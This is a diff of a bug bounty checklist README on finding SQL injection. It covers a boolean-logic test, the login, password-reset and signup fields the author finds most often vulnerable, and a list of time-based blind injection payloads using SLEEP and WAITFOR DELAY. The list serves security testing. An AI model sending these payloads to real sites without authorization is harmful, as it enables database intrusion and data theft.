0xmaximus/Galaxy-Bugbounty-Checklist/SQL injection/README.md

+## How to find SQL injectiosn vulnerability?

+### 1) logical operation
 One of the best ways to confirm a SQL injection is by making it operate a logical operation and having the expected results.

-For example: if the GET parameter ?username=Peter returns the same content as ?username=Peter' or '1'='1 then, you found a SQL injection.
+For example: if the GET parameter `?username=Peter` returns the same content as `?username=Peter'` or `?username=Peter+'1'='1` then, you found a SQL injection.

+## 2) Time Based SQL Injection
+90% from my finds in SQL injection as
+ [POST Request]
+1 Login page in username parameter
+2 Forget password page username parameter
+3 Singup Page firstname and last name parameter

+Payloads:
 ```
 orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
 (SlEeP%09(14-(5-2)))
 ')) or sleep(5)='
+' WAITFOR DELAY '0:0:5'--
 ;waitfor delay '0:0:5'--
 );waitfor delay '0:0:5'--
 ';waitfor delay '0:0:5'--